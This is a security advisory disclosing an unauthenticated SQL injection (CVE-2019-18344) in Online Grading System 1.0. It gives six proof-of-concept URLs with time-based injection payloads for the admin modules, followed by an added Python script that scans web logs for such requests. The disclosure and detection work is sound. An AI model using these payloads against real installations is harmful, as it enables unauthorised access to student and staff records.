Online Grading System 1.0 SQLi

by Vince

Disclosure date: 10/23/19

CVE-2019-18344

Online Grading System 1.0 is vulnerable to unauthenticated SQL injection, which allows remote attackers to execute arbitrary SQL commands via the student, instructor, department, room, class, and user parameters.

Proof of Concept:

http://192.168.86.24/admin/modules/student/index.php?view=edit&id=20004277 AND 1789=BENCHMARK(5000000,MD5(0x4564524a))
http://192.168.86.24/admin/modules/instructor/index.php?view=edit&id=1 and SLEEP(5)
http://192.168.86.24/admin/modules/department/index.php?view=edit&id=1 and SLEEP(5)
http://192.168.86.24/admin/modules/room/index.php?view=edit&id=0 and SLEEP(5)
http://192.168.86.24/admin/modules/class/index.php?view=time&classId=3 and SLEEP(5)
http://192.168.86.24/admin/modules/user/index.php?view=edit&id=1 and SLEEP(5)
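
A defender-side check for the requests above, added here as an example and not part of the original advisory: it scans web access logs for requests to the six affected modules whose id or classId value is not a plain integer. The Combined Log Format, the assumption that legitimate ids are decimal integers, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Modules and parameters taken from the advisory's proof-of-concept URLs.
MODULES = {"student", "instructor", "department", "room", "class", "user"}
ID_PARAMS = {"id", "classId"}
# search() rather than match(), so an install under a sub-directory still matches.
PATH_RE = re.compile(r"/admin/modules/([a-z]+)/index\.php$")
# Assumption: legitimate record ids are plain decimal integers.
INT_RE = re.compile(r"[0-9]+")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(module, param, value)] for non-integer ids sent to affected modules."""
    parts = urlsplit(target)
    m = PATH_RE.search(parts.path)
    if not m or m.group(1) not in MODULES:
        return []
    hits = []
    # parse_qsl percent-decodes and maps '+' to a space, as the server would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in ID_PARAMS and not INT_RE.fullmatch(value):
            hits.append((m.group(1), name, value))
    return hits


def scan(log_lines):
    """Yield (line_number, module, param, value) for each flagged request."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            for module, param, value in suspicious_params(m.group(1)):
                yield (n, module, param, value)


# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Oct/2019:10:00:01 +0000] "GET /admin/modules/student/index.php?view=edit&id=20004277 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [23/Oct/2019:10:00:07 +0000] "GET /admin/modules/room/index.php?view=edit&id=0%20and%20SLEEP(5) HTTP/1.1" 200 4876',
    '10.0.0.9 - - [23/Oct/2019:10:00:13 +0000] "GET /admin/modules/class/index.php?view=time&classId=3+and+SLEEP(5) HTTP/1.1" 200 4990',
    '10.0.0.5 - - [23/Oct/2019:10:00:20 +0000] "GET /index.php?id=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the endpoints are reachable without authentication, any flagged request is worth reviewing regardless of the response code.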